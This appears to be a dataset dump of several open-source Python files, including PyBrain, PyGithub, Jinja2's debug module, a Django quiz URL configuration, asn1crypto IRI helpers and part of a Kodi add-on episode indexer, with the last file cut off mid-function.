repo_name stringlengths 5 100 | path stringlengths 4 375 | copies stringclasses 991
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
chugunovyar/factoryForBuild | env/lib/python2.7/site-packages/pybrain/structure/networks/custom/convboard.py | 4 | 2775 | from pybrain.structure.modules.linearlayer import LinearLayer
from pybrain.structure.moduleslice import ModuleSlice
from pybrain.structure.connections.identity import IdentityConnection
from pybrain.structure.networks.feedforward import FeedForwardNetwork
from pybrain.structure.connections.shared import MotherConnection, SharedFullConnection
from pybrain.structure.modules.biasunit import BiasUnit
from pybrain.utilities import crossproduct
from pybrain.structure.networks.convolutional import SimpleConvolutionalNetwork
__author__ = 'Tom Schaul, tom@idsia.ch'
class ConvolutionalBoardNetwork(SimpleConvolutionalNetwork):
""" A type of convolutional network, designed for handling game boards.
It pads the borders with a uniform bias input to allow one output per board position.
"""
def __init__(self, boardSize, convSize, numFeatureMaps, **args):
inputdim = 2
FeedForwardNetwork.__init__(self, **args)
inlayer = LinearLayer(inputdim*boardSize*boardSize, name = 'in')
self.addInputModule(inlayer)
# we need some treatment of the border too - thus we pad the direct board input.
x = convSize/2
insize = boardSize+2*x
if convSize % 2 == 0:
insize -= 1
paddedlayer = LinearLayer(inputdim*insize*insize, name = 'pad')
self.addModule(paddedlayer)
# we connect a bias to the padded-parts (with shared but trainable weights).
bias = BiasUnit()
self.addModule(bias)
biasConn = MotherConnection(inputdim)
paddable = []
if convSize % 2 == 0:
xs = range(x)+range(insize-x+1, insize)
else:
xs = range(x)+range(insize-x, insize)
paddable.extend(crossproduct([range(insize), xs]))
paddable.extend(crossproduct([xs, range(x, boardSize+x)]))
for (i, j) in paddable:
self.addConnection(SharedFullConnection(biasConn, bias, paddedlayer,
outSliceFrom = (i*insize+j)*inputdim,
outSliceTo = (i*insize+j+1)*inputdim))
for i in range(boardSize):
inmod = ModuleSlice(inlayer, outSliceFrom = i*boardSize*inputdim,
outSliceTo = (i+1)*boardSize*inputdim)
outmod = ModuleSlice(paddedlayer, inSliceFrom = ((i+x)*insize+x)*inputdim,
inSliceTo = ((i+x)*insize+x+boardSize)*inputdim)
self.addConnection(IdentityConnection(inmod, outmod))
self._buildStructure(inputdim, insize, paddedlayer, convSize, numFeatureMaps)
self.sortModules()
| gpl-3.0 |
dannyboi104/SickRage | lib/github/GitTag.py | 74 | 4322 | # -*- coding: utf-8 -*-
# ########################## Copyrights and license ############################
# #
# Copyright 2012 Vincent Jacques <vincent@vincent-jacques.net> #
# Copyright 2012 Zearin <zearin@gonk.net> #
# Copyright 2013 AKFish <akfish@gmail.com> #
# Copyright 2013 Vincent Jacques <vincent@vincent-jacques.net> #
# #
# This file is part of PyGithub. http://jacquev6.github.com/PyGithub/ #
# #
# PyGithub is free software: you can redistribute it and/or modify it under #
# the terms of the GNU Lesser General Public License as published by the Free #
# Software Foundation, either version 3 of the License, or (at your option) #
# any later version. #
# #
# PyGithub is distributed in the hope that it will be useful, but WITHOUT ANY #
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS #
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more #
# details. #
# #
# You should have received a copy of the GNU Lesser General Public License #
# along with PyGithub. If not, see <http://www.gnu.org/licenses/>. #
# #
# ##############################################################################
import github.GithubObject
import github.GitAuthor
import github.GitObject
class GitTag(github.GithubObject.CompletableGithubObject):
"""
This class represents GitTags as returned for example by http://developer.github.com/v3/todo
"""
@property
def message(self):
"""
:type: string
"""
self._completeIfNotSet(self._message)
return self._message.value
@property
def object(self):
"""
:type: :class:`github.GitObject.GitObject`
"""
self._completeIfNotSet(self._object)
return self._object.value
@property
def sha(self):
"""
:type: string
"""
self._completeIfNotSet(self._sha)
return self._sha.value
@property
def tag(self):
"""
:type: string
"""
self._completeIfNotSet(self._tag)
return self._tag.value
@property
def tagger(self):
"""
:type: :class:`github.GitAuthor.GitAuthor`
"""
self._completeIfNotSet(self._tagger)
return self._tagger.value
@property
def url(self):
"""
:type: string
"""
self._completeIfNotSet(self._url)
return self._url.value
def _initAttributes(self):
self._message = github.GithubObject.NotSet
self._object = github.GithubObject.NotSet
self._sha = github.GithubObject.NotSet
self._tag = github.GithubObject.NotSet
self._tagger = github.GithubObject.NotSet
self._url = github.GithubObject.NotSet
def _useAttributes(self, attributes):
if "message" in attributes: # pragma no branch
self._message = self._makeStringAttribute(attributes["message"])
if "object" in attributes: # pragma no branch
self._object = self._makeClassAttribute(github.GitObject.GitObject, attributes["object"])
if "sha" in attributes: # pragma no branch
self._sha = self._makeStringAttribute(attributes["sha"])
if "tag" in attributes: # pragma no branch
self._tag = self._makeStringAttribute(attributes["tag"])
if "tagger" in attributes: # pragma no branch
self._tagger = self._makeClassAttribute(github.GitAuthor.GitAuthor, attributes["tagger"])
if "url" in attributes: # pragma no branch
self._url = self._makeStringAttribute(attributes["url"])
| gpl-3.0 |
joeythesaint/yocto-autobuilder | lib/python2.7/site-packages/Jinja2-2.6-py2.7.egg/jinja2/debug.py | 112 | 11028 | # -*- coding: utf-8 -*-
"""
jinja2.debug
~~~~~~~~~~~~
Implements the debug interface for Jinja. This module does some pretty
ugly stuff with the Python traceback system in order to achieve tracebacks
with correct line numbers, locals and contents.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
import sys
import traceback
from types import TracebackType
from jinja2.utils import CodeType, missing, internal_code
from jinja2.exceptions import TemplateSyntaxError
# on pypy we can take advantage of transparent proxies
try:
from __pypy__ import tproxy
except ImportError:
tproxy = None
# how does the raise helper look like?
try:
exec "raise TypeError, 'foo'"
except SyntaxError:
raise_helper = 'raise __jinja_exception__[1]'
except TypeError:
raise_helper = 'raise __jinja_exception__[0], __jinja_exception__[1]'
class TracebackFrameProxy(object):
"""Proxies a traceback frame."""
def __init__(self, tb):
self.tb = tb
self._tb_next = None
@property
def tb_next(self):
return self._tb_next
def set_next(self, next):
if tb_set_next is not None:
try:
tb_set_next(self.tb, next and next.tb or None)
except Exception:
# this function can fail due to all the hackery it does
# on various python implementations. We just catch errors
# down and ignore them if necessary.
pass
self._tb_next = next
@property
def is_jinja_frame(self):
return '__jinja_template__' in self.tb.tb_frame.f_globals
def __getattr__(self, name):
return getattr(self.tb, name)
def make_frame_proxy(frame):
proxy = TracebackFrameProxy(frame)
if tproxy is None:
return proxy
def operation_handler(operation, *args, **kwargs):
if operation in ('__getattribute__', '__getattr__'):
return getattr(proxy, args[0])
elif operation == '__setattr__':
proxy.__setattr__(*args, **kwargs)
else:
return getattr(proxy, operation)(*args, **kwargs)
return tproxy(TracebackType, operation_handler)
class ProcessedTraceback(object):
"""Holds a Jinja preprocessed traceback for priting or reraising."""
def __init__(self, exc_type, exc_value, frames):
assert frames, 'no frames for this traceback?'
self.exc_type = exc_type
self.exc_value = exc_value
self.frames = frames
# newly concatenate the frames (which are proxies)
prev_tb = None
for tb in self.frames:
if prev_tb is not None:
prev_tb.set_next(tb)
prev_tb = tb
prev_tb.set_next(None)
def render_as_text(self, limit=None):
"""Return a string with the traceback."""
lines = traceback.format_exception(self.exc_type, self.exc_value,
self.frames[0], limit=limit)
return ''.join(lines).rstrip()
def render_as_html(self, full=False):
"""Return a unicode string with the traceback as rendered HTML."""
from jinja2.debugrenderer import render_traceback
return u'%s\n\n<!--\n%s\n-->' % (
render_traceback(self, full=full),
self.render_as_text().decode('utf-8', 'replace')
)
@property
def is_template_syntax_error(self):
"""`True` if this is a template syntax error."""
return isinstance(self.exc_value, TemplateSyntaxError)
@property
def exc_info(self):
"""Exception info tuple with a proxy around the frame objects."""
return self.exc_type, self.exc_value, self.frames[0]
@property
def standard_exc_info(self):
"""Standard python exc_info for re-raising"""
tb = self.frames[0]
# the frame will be an actual traceback (or transparent proxy) if
# we are on pypy or a python implementation with support for tproxy
if type(tb) is not TracebackType:
tb = tb.tb
return self.exc_type, self.exc_value, tb
def make_traceback(exc_info, source_hint=None):
"""Creates a processed traceback object from the exc_info."""
exc_type, exc_value, tb = exc_info
if isinstance(exc_value, TemplateSyntaxError):
exc_info = translate_syntax_error(exc_value, source_hint)
initial_skip = 0
else:
initial_skip = 1
return translate_exception(exc_info, initial_skip)
def translate_syntax_error(error, source=None):
"""Rewrites a syntax error to please traceback systems."""
error.source = source
error.translated = True
exc_info = (error.__class__, error, None)
filename = error.filename
if filename is None:
filename = '<unknown>'
return fake_exc_info(exc_info, filename, error.lineno)
def translate_exception(exc_info, initial_skip=0):
"""If passed an exc_info it will automatically rewrite the exceptions
all the way down to the correct line numbers and frames.
"""
tb = exc_info[2]
frames = []
# skip some internal frames if wanted
for x in xrange(initial_skip):
if tb is not None:
tb = tb.tb_next
initial_tb = tb
while tb is not None:
# skip frames decorated with @internalcode. These are internal
# calls we can't avoid and that are useless in template debugging
# output.
if tb.tb_frame.f_code in internal_code:
tb = tb.tb_next
continue
# save a reference to the next frame if we override the current
# one with a faked one.
next = tb.tb_next
# fake template exceptions
template = tb.tb_frame.f_globals.get('__jinja_template__')
if template is not None:
lineno = template.get_corresponding_lineno(tb.tb_lineno)
tb = fake_exc_info(exc_info[:2] + (tb,), template.filename,
lineno)[2]
frames.append(make_frame_proxy(tb))
tb = next
# if we don't have any exceptions in the frames left, we have to
# reraise it unchanged.
# XXX: can we backup here? when could this happen?
if not frames:
raise exc_info[0], exc_info[1], exc_info[2]
return ProcessedTraceback(exc_info[0], exc_info[1], frames)
def fake_exc_info(exc_info, filename, lineno):
"""Helper for `translate_exception`."""
exc_type, exc_value, tb = exc_info
# figure the real context out
if tb is not None:
real_locals = tb.tb_frame.f_locals.copy()
ctx = real_locals.get('context')
if ctx:
locals = ctx.get_all()
else:
locals = {}
for name, value in real_locals.iteritems():
if name.startswith('l_') and value is not missing:
locals[name[2:]] = value
# if there is a local called __jinja_exception__, we get
# rid of it to not break the debug functionality.
locals.pop('__jinja_exception__', None)
else:
locals = {}
# assamble fake globals we need
globals = {
'__name__': filename,
'__file__': filename,
'__jinja_exception__': exc_info[:2],
# we don't want to keep the reference to the template around
# to not cause circular dependencies, but we mark it as Jinja
# frame for the ProcessedTraceback
'__jinja_template__': None
}
# and fake the exception
code = compile('\n' * (lineno - 1) + raise_helper, filename, 'exec')
# if it's possible, change the name of the code. This won't work
# on some python environments such as google appengine
try:
if tb is None:
location = 'template'
else:
function = tb.tb_frame.f_code.co_name
if function == 'root':
location = 'top-level template code'
elif function.startswith('block_'):
location = 'block "%s"' % function[6:]
else:
location = 'template'
code = CodeType(0, code.co_nlocals, code.co_stacksize,
code.co_flags, code.co_code, code.co_consts,
code.co_names, code.co_varnames, filename,
location, code.co_firstlineno,
code.co_lnotab, (), ())
except:
pass
# execute the code and catch the new traceback
try:
exec code in globals, locals
except:
exc_info = sys.exc_info()
new_tb = exc_info[2].tb_next
# return without this frame
return exc_info[:2] + (new_tb,)
def _init_ugly_crap():
"""This function implements a few ugly things so that we can patch the
traceback objects. The function returned allows resetting `tb_next` on
any python traceback object. Do not attempt to use this on non cpython
interpreters
"""
import ctypes
from types import TracebackType
# figure out side of _Py_ssize_t
if hasattr(ctypes.pythonapi, 'Py_InitModule4_64'):
_Py_ssize_t = ctypes.c_int64
else:
_Py_ssize_t = ctypes.c_int
# regular python
class _PyObject(ctypes.Structure):
pass
_PyObject._fields_ = [
('ob_refcnt', _Py_ssize_t),
('ob_type', ctypes.POINTER(_PyObject))
]
# python with trace
if hasattr(sys, 'getobjects'):
class _PyObject(ctypes.Structure):
pass
_PyObject._fields_ = [
('_ob_next', ctypes.POINTER(_PyObject)),
('_ob_prev', ctypes.POINTER(_PyObject)),
('ob_refcnt', _Py_ssize_t),
('ob_type', ctypes.POINTER(_PyObject))
]
class _Traceback(_PyObject):
pass
_Traceback._fields_ = [
('tb_next', ctypes.POINTER(_Traceback)),
('tb_frame', ctypes.POINTER(_PyObject)),
('tb_lasti', ctypes.c_int),
('tb_lineno', ctypes.c_int)
]
def tb_set_next(tb, next):
"""Set the tb_next attribute of a traceback object."""
if not (isinstance(tb, TracebackType) and
(next is None or isinstance(next, TracebackType))):
raise TypeError('tb_set_next arguments must be traceback objects')
obj = _Traceback.from_address(id(tb))
if tb.tb_next is not None:
old = _Traceback.from_address(id(tb.tb_next))
old.ob_refcnt -= 1
if next is None:
obj.tb_next = ctypes.POINTER(_Traceback)()
else:
next = _Traceback.from_address(id(next))
next.ob_refcnt += 1
obj.tb_next = ctypes.pointer(next)
return tb_set_next
# try to get a tb_set_next implementation if we don't have transparent
# proxies.
tb_set_next = None
if tproxy is None:
try:
from jinja2._debugsupport import tb_set_next
except ImportError:
try:
tb_set_next = _init_ugly_crap()
except:
pass
del _init_ugly_crap
| gpl-2.0 |
amragaey/AndroidWEB | quizes/urls.py | 1 | 1126 | from django.conf.urls import url
from quizes import views
urlpatterns = [
url(r'^quizes/?$', views.viewQuizes.as_view()),
url(r'^quizes/create/?$', views.createQuiz.as_view()),
url(r'^quizes/(?P<pk>\d+)/?$', views.singleQuiz.as_view()),
# url(r'^questions/?$', views.viewQuestions.as_view()),
# url(r'^questions/create/?$', views.createQuestion.as_view()),
# url(r'^questions/(?P<pk>\d+)/?$', views.singleQuestion.as_view()),
# url(r'^choices/?$', views.viewChoices.as_view()),
# url(r'^choices/create/?$', views.createChoice.as_view()),
# url(r'^choices/(?P<pk>\d+)/?$', views.singleChoice.as_view()),
url(r'^QuizAttempts/?$', views.viewAttempts.as_view()),
url(r'^QuizAttempts/create/?$', views.createAttempt.as_view()),
url(r'^QuizAttempts/(?P<pk>\d+)/?$', views.singleAttempt.as_view()),
url(r'^Answers/?$', views.viewAnswers.as_view()),
url(r'^Answers/create/?$', views.createAnswer.as_view()),
url(r'^Answers/(?P<pk>\d+)/?$', views.singleAnswer.as_view()),
# url(r'^quizes/Attempts/(?P<pk>\d+)/questinsAttempts/create/?$', views.createQattempts.as_view()),
] | mit |
repotvsupertuga/repo | instal/plugin.video.SportsDevil/service/asn1crypto/_iri.py | 27 | 8628 | # coding: utf-8
"""
Functions to convert unicode IRIs into ASCII byte string URIs and back. Exports
the following items:
- iri_to_uri()
- uri_to_iri()
"""
from __future__ import unicode_literals, division, absolute_import, print_function
from encodings import idna # noqa
import codecs
import re
import sys
from ._errors import unwrap
from ._types import byte_cls, str_cls, type_name, bytes_to_list, int_types
if sys.version_info < (3,):
from urlparse import urlsplit, urlunsplit
from urllib import (
quote as urlquote,
unquote as unquote_to_bytes,
)
else:
from urllib.parse import (
quote as urlquote,
unquote_to_bytes,
urlsplit,
urlunsplit,
)
def iri_to_uri(value):
"""
Normalizes and encodes a unicode IRI into an ASCII byte string URI
:param value:
A unicode string of an IRI
:return:
A byte string of the ASCII-encoded URI
"""
if not isinstance(value, str_cls):
raise TypeError(unwrap(
'''
value must be a unicode string, not %s
''',
type_name(value)
))
scheme = None
# Python 2.6 doesn't split properly is the URL doesn't start with http:// or https://
if sys.version_info < (2, 7) and not value.startswith('http://') and not value.startswith('https://'):
real_prefix = None
prefix_match = re.match('^[^:]*://', value)
if prefix_match:
real_prefix = prefix_match.group(0)
value = 'http://' + value[len(real_prefix):]
parsed = urlsplit(value)
if real_prefix:
value = real_prefix + value[7:]
scheme = _urlquote(real_prefix[:-3])
else:
parsed = urlsplit(value)
if scheme is None:
scheme = _urlquote(parsed.scheme)
hostname = parsed.hostname
if hostname is not None:
hostname = hostname.encode('idna')
# RFC 3986 allows userinfo to contain sub-delims
username = _urlquote(parsed.username, safe='!$&\'()*+,;=')
password = _urlquote(parsed.password, safe='!$&\'()*+,;=')
port = parsed.port
if port is not None:
port = str_cls(port).encode('ascii')
netloc = b''
if username is not None:
netloc += username
if password:
netloc += b':' + password
netloc += b'@'
if hostname is not None:
netloc += hostname
if port is not None:
default_http = scheme == b'http' and port == b'80'
default_https = scheme == b'https' and port == b'443'
if not default_http and not default_https:
netloc += b':' + port
# RFC 3986 allows a path to contain sub-delims, plus "@" and ":"
path = _urlquote(parsed.path, safe='/!$&\'()*+,;=@:')
# RFC 3986 allows the query to contain sub-delims, plus "@", ":" , "/" and "?"
query = _urlquote(parsed.query, safe='/?!$&\'()*+,;=@:')
# RFC 3986 allows the fragment to contain sub-delims, plus "@", ":" , "/" and "?"
fragment = _urlquote(parsed.fragment, safe='/?!$&\'()*+,;=@:')
if query is None and fragment is None and path == b'/':
path = None
# Python 2.7 compat
if path is None:
path = ''
output = urlunsplit((scheme, netloc, path, query, fragment))
if isinstance(output, str_cls):
output = output.encode('latin1')
return output
def uri_to_iri(value):
"""
Converts an ASCII URI byte string into a unicode IRI
:param value:
An ASCII-encoded byte string of the URI
:return:
A unicode string of the IRI
"""
if not isinstance(value, byte_cls):
raise TypeError(unwrap(
'''
value must be a byte string, not %s
''',
type_name(value)
))
parsed = urlsplit(value)
scheme = parsed.scheme
if scheme is not None:
scheme = scheme.decode('ascii')
username = _urlunquote(parsed.username, remap=[':', '@'])
password = _urlunquote(parsed.password, remap=[':', '@'])
hostname = parsed.hostname
if hostname:
hostname = hostname.decode('idna')
port = parsed.port
if port and not isinstance(port, int_types):
port = port.decode('ascii')
netloc = ''
if username is not None:
netloc += username
if password:
netloc += ':' + password
netloc += '@'
if hostname is not None:
netloc += hostname
if port is not None:
netloc += ':' + str_cls(port)
path = _urlunquote(parsed.path, remap=['/'], preserve=True)
query = _urlunquote(parsed.query, remap=['&', '='], preserve=True)
fragment = _urlunquote(parsed.fragment)
return urlunsplit((scheme, netloc, path, query, fragment))
def _iri_utf8_errors_handler(exc):
"""
Error handler for decoding UTF-8 parts of a URI into an IRI. Leaves byte
sequences encoded in %XX format, but as part of a unicode string.
:param exc:
The UnicodeDecodeError exception
:return:
A 2-element tuple of (replacement unicode string, integer index to
resume at)
"""
bytes_as_ints = bytes_to_list(exc.object[exc.start:exc.end])
replacements = ['%%%02x' % num for num in bytes_as_ints]
return (''.join(replacements), exc.end)
codecs.register_error('iriutf8', _iri_utf8_errors_handler)
def _urlquote(string, safe=''):
"""
Quotes a unicode string for use in a URL
:param string:
A unicode string
:param safe:
A unicode string of character to not encode
:return:
None (if string is None) or an ASCII byte string of the quoted string
"""
if string is None or string == '':
return None
# Anything already hex quoted is pulled out of the URL and unquoted if
# possible
escapes = []
if re.search('%[0-9a-fA-F]{2}', string):
# Try to unquote any percent values, restoring them if they are not
# valid UTF-8. Also, requote any safe chars since encoded versions of
# those are functionally different than the unquoted ones.
def _try_unescape(match):
byte_string = unquote_to_bytes(match.group(0))
unicode_string = byte_string.decode('utf-8', 'iriutf8')
for safe_char in list(safe):
unicode_string = unicode_string.replace(safe_char, '%%%02x' % ord(safe_char))
return unicode_string
string = re.sub('(?:%[0-9a-fA-F]{2})+', _try_unescape, string)
# Once we have the minimal set of hex quoted values, removed them from
# the string so that they are not double quoted
def _extract_escape(match):
escapes.append(match.group(0).encode('ascii'))
return '\x00'
string = re.sub('%[0-9a-fA-F]{2}', _extract_escape, string)
output = urlquote(string.encode('utf-8'), safe=safe.encode('utf-8'))
if not isinstance(output, byte_cls):
output = output.encode('ascii')
# Restore the existing quoted values that we extracted
if len(escapes) > 0:
def _return_escape(_):
return escapes.pop(0)
output = re.sub(b'%00', _return_escape, output)
return output
def _urlunquote(byte_string, remap=None, preserve=None):
"""
Unquotes a URI portion from a byte string into unicode using UTF-8
:param byte_string:
A byte string of the data to unquote
:param remap:
A list of characters (as unicode) that should be re-mapped to a
%XX encoding. This is used when characters are not valid in part of a
URL.
:param preserve:
A bool - indicates that the chars to be remapped if they occur in
non-hex form, should be preserved. E.g. / for URL path.
:return:
A unicode string
"""
if byte_string is None:
return byte_string
if byte_string == b'':
return ''
if preserve:
replacements = ['\x1A', '\x1C', '\x1D', '\x1E', '\x1F']
preserve_unmap = {}
for char in remap:
replacement = replacements.pop(0)
preserve_unmap[replacement] = char
byte_string = byte_string.replace(char.encode('ascii'), replacement.encode('ascii'))
byte_string = unquote_to_bytes(byte_string)
if remap:
for char in remap:
byte_string = byte_string.replace(char.encode('ascii'), ('%%%02x' % ord(char)).encode('ascii'))
output = byte_string.decode('utf-8', 'iriutf8')
if preserve:
for replacement, original in preserve_unmap.items():
output = output.replace(replacement, original)
return output
| gpl-2.0 |
repotvsupertuga/repo | plugin.video.loganaddon/resources/lib/indexers/episodes.py | 6 | 57686 | # -*- coding: utf-8 -*-
'''
Specto Add-on
Copyright (C) 2015 lambda
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import os,sys,re,json,zipfile,StringIO,urllib,urllib2,urlparse,base64,datetime
from resources.lib.libraries import trakt
from resources.lib.libraries import cleantitle
from resources.lib.libraries import control
from resources.lib.libraries import client
from resources.lib.libraries import cache
from resources.lib.libraries import favourites
from resources.lib.libraries import workers
from resources.lib.libraries import views
from resources.lib.libraries import playcount
class seasons:
def __init__(self):
self.list = []
self.tvdb_key = control.tvdb_key
self.datetime = (datetime.datetime.utcnow() - datetime.timedelta(hours = 5))
self.today_date = (self.datetime).strftime('%Y-%m-%d')
self.info_lang = control.info_lang or 'en'
self.tvdb_info_link = 'http://thetvdb.com/api/%s/series/%s/all/%s.zip' % (self.tvdb_key, '%s', '%s')
self.tvdb_by_imdb = 'http://thetvdb.com/api/GetSeriesByRemoteID.php?imdbid=%s'
self.tmdb_image = 'http://image.tmdb.org/t/p/original'
self.tmdb_poster = 'http://image.tmdb.org/t/p/w500'
self.tvdb_image = 'http://thetvdb.com/banners/'
self.tvdb_poster = 'http://thetvdb.com/banners/_cache/'
def get(self, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, idx=True):
if idx == True:
self.list = cache.get(self.tvdb_list, 24, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, self.info_lang)
self.seasonDirectory(self.list)
return self.list
else:
self.list = self.tvdb_list(tvshowtitle, year, imdb, tmdb, tvdb, tvrage, self.info_lang)
return self.list
def tvdb_list(self, tvshowtitle, year, imdb, tmdb, tvdb, tvrage, lang, limit=''):
try:
if tvdb == '0' and not imdb == '0':
url = self.tvdb_by_imdb % imdb
result = client.request(url, timeout='10')
try: tvdb = client.parseDOM(result, 'seriesid')[0]
except: tvdb = '0'
try: name = client.parseDOM(result, 'SeriesName')[0]
except: name = '0'
dupe = re.compile('[***]Duplicate (\d*)[***]').findall(name)
if len(dupe) > 0: tvdb = str(dupe[0])
if tvdb == '': tvdb = '0'
tvdb = tvdb.encode('utf-8')
if tvdb == '0' and not imdb == '0':
url = self.tmdb_by_imdb % imdb
result = client.request(url, timeout='10')
result = json.loads(result)
tmdb = result['tv_results'][0]['id']
if tmdb == '' or tmdb == None: tmdb = '0'
tmdb = re.sub('[^0-9]', '', str(tmdb))
tmdb = tmdb.encode('utf-8')
if not tmdb == '0':
#url = self.tmdb_info_link % (tmdb, lang)
url = self.tmdb_info_link % (tmdb, 'en')
item = client.request(url, timeout='10')
item = json.loads(item)
tvdb = item['external_ids']['tvdb_id']
if tvdb == '' or tvdb == None: tvdb = '0'
tvdb = re.sub('[^0-9]', '', str(tvdb))
tvdb = tvdb.encode('utf-8')
except:
pass
try:
try: item = item
except: item = ''
if limit == '-2' or not item == '': raise Exception()
if tmdb == '0' and not imdb == '0':
url = self.tmdb_by_imdb % imdb
result = client.request(url, timeout='10')
result = json.loads(result)
tmdb = result['tv_results'][0]['id']
if tmdb == '' or tmdb == None: tmdb = '0'
tmdb = re.sub('[^0-9]', '', str(tmdb))
tmdb = tmdb.encode('utf-8')
if tmdb == '0' and not tvdb == '0':
url = self.tmdb_by_tvdb % tvdb
result = client.request(url, timeout='10')
result = json.loads(result)
tmdb = result['tv_results'][0]['id']
if tmdb == '' or tmdb == None: tmdb = '0'
tmdb = re.sub('[^0-9]', '', str(tmdb))
tmdb = tmdb.encode('utf-8')
if tmdb == '0': raise Exception()
#url = self.tmdb_info_link % (tmdb, lang)
url = self.tmdb_info_link % (tmdb, 'en')
item = client.request(url, timeout='10')
item = json.loads(item)
except:
pass
try:
if tvdb == '0': raise Exception()
#tvdb_lang = re.sub('bg', 'en', lang)
tvdb_lang = 'en'
url = self.tvdb_info_link % (tvdb, tvdb_lang)
data = urllib2.urlopen(url, timeout=30).read()
zip = zipfile.ZipFile(StringIO.StringIO(data))
result = zip.read('%s.xml' % tvdb_lang)
artwork = zip.read('banners.xml')
zip.close()
dupe = client.parseDOM(result, 'SeriesName')[0]
dupe = re.compile('[***]Duplicate (\d*)[***]').findall(dupe)
if len(dupe) > 0:
tvdb = str(dupe[0]).encode('utf-8')
url = self.tvdb_info_link % (tvdb, tvdb_lang)
data = urllib2.urlopen(url, timeout=30).read()
zip = zipfile.ZipFile(StringIO.StringIO(data))
result = zip.read('%s.xml' % tvdb_lang)
artwork = zip.read('banners.xml')
zip.close()
artwork = artwork.split('<Banner>')
artwork = [i for i in artwork if '<Language>en</Language>' in i and '<BannerType>season</BannerType>' in i]
artwork = [i for i in artwork if not 'seasonswide' in re.compile('<BannerPath>(.+?)</BannerPath>').findall(i)[0]]
result = result.split('<Episode>')
item2 = result[0]
episodes = [i for i in result if '<EpisodeNumber>' in i]
episodes = [i for i in episodes if not '<SeasonNumber>0</SeasonNumber>' in i]
episodes = [i for i in episodes if not '<EpisodeNumber>0</EpisodeNumber>' in i]
seasons = [i for i in episodes if '<EpisodeNumber>1</EpisodeNumber>' in i]
result = ''
if limit == '':
episodes = []
elif limit == '-1' or limit == '-2':
seasons = []
else:
episodes = [i for i in episodes if '<SeasonNumber>%01d</SeasonNumber>' % int(limit) in i]
seasons = []
try: poster = item['poster_path']
except: poster = ''
if poster == '' or poster == None: poster = '0'
if not poster == '0': poster = self.tmdb_poster + poster
if poster == '0':
try: poster = client.parseDOM(item2, 'poster')[0]
except: poster = ''
if not poster == '': poster = self.tvdb_image + poster
else: poster = '0'
poster = client.replaceHTMLCodes(poster)
poster = poster.encode('utf-8')
try: banner = client.parseDOM(item2, 'banner')[0]
except: banner = ''
if not banner == '': banner = self.tvdb_image + banner
else: banner = '0'
banner = client.replaceHTMLCodes(banner)
banner = banner.encode('utf-8')
try: fanart = item['backdrop_path']
except: fanart = ''
if fanart == '' or fanart == None: fanart = '0'
if not fanart == '0': fanart = self.tmdb_image + fanart
if fanart == '0':
try: fanart = client.parseDOM(item2, 'fanart')[0]
except: fanart = ''
if not fanart == '': fanart = self.tvdb_image + fanart
else: fanart = '0'
fanart = client.replaceHTMLCodes(fanart)
fanart = fanart.encode('utf-8')
if not poster == '0': pass
elif not fanart == '0': poster = fanart
elif not banner == '0': poster = banner
if not banner == '0': pass
elif not fanart == '0': banner = fanart
elif not poster == '0': banner = poster
try: tvrage2 = item['external_ids']['tvrage_id']
except: tvrage2 = '0'
if tvrage == '0' or tvrage == None: tvrage = tvrage2
if tvrage == '' or tvrage == None: tvrage = '0'
tvrage = re.sub('[^0-9]', '', str(tvrage))
tvrage = tvrage.encode('utf-8')
try: status = client.parseDOM(item2, 'Status')[0]
except: status = ''
if status == '': status = 'Ended'
status = client.replaceHTMLCodes(status)
status = status.encode('utf-8')
try: alter = client.parseDOM(item2, 'Genre')[0]
except: alter = '0'
if any(x in alter for x in ['Documentary', 'Reality', 'Game Show', 'Talk Show']): alter = '1'
else: alter = '0'
alter = alter.encode('utf-8')
try: studio = item['networks'][0]['name']
except: studio = ''
if studio == '' or studio == None:
try: studio = client.parseDOM(item2, 'Network')[0]
except: studio = ''
if studio == '': studio = '0'
studio = client.replaceHTMLCodes(studio)
studio = studio.encode('utf-8')
try: genre = item['genres']
except: genre = []
try: genre = [x['name'] for x in genre]
except: genre = []
if genre == '' or genre == None or genre == []:
try: genre = client.parseDOM(item2, 'Genre')[0]
except: genre = ''
genre = [x for x in genre.split('|') if not x == '']
genre = ' / '.join(genre)
if genre == '': genre = '0'
genre = client.replaceHTMLCodes(genre)
genre = genre.encode('utf-8')
try: duration = str(item['episode_run_time'][0])
except: duration = ''
if duration == '' or duration == None:
try: duration = client.parseDOM(item2, 'Runtime')[0]
except: duration = ''
if duration == '': duration = '0'
duration = client.replaceHTMLCodes(duration)
duration = duration.encode('utf-8')
try: rating = str(item['vote_average'])
except: rating = ''
if rating == '' or rating == None:
try: rating = client.parseDOM(item2, 'Rating')[0]
except: rating = ''
if rating == '': rating = '0'
rating = client.replaceHTMLCodes(rating)
rating = rating.encode('utf-8')
try: votes = str(item['vote_count'])
except: votes = ''
try: votes = str(format(int(votes),',d'))
except: pass
if votes == '' or votes == None:
try: votes = client.parseDOM(item2, 'RatingCount')[0]
except: votes = '0'
if votes == '': votes = '0'
votes = client.replaceHTMLCodes(votes)
votes = votes.encode('utf-8')
try: mpaa = item['content_ratings']['results'][-1]['rating']
except: mpaa = ''
if mpaa == '' or mpaa == None:
try: mpaa = client.parseDOM(item2, 'ContentRating')[0]
except: mpaa = ''
if mpaa == '': mpaa = '0'
mpaa = client.replaceHTMLCodes(mpaa)
mpaa = mpaa.encode('utf-8')
try: cast = item['credits']['cast']
except: cast = []
try: cast = [(x['name'].encode('utf-8'), x['character'].encode('utf-8')) for x in cast]
except: cast = []
if cast == []:
try: cast = client.parseDOM(item2, 'Actors')[0]
except: cast = ''
cast = [x for x in cast.split('|') if not x == '']
try: cast = [(x.encode('utf-8'), '') for x in cast]
except: cast = []
try: plot = item['overview']
except: plot = ''
if plot == '' or plot == None:
try: plot = client.parseDOM(item2, 'Overview')[0]
except: plot = ''
if plot == '': plot = '0'
plot = client.replaceHTMLCodes(plot)
plot = plot.encode('utf-8')
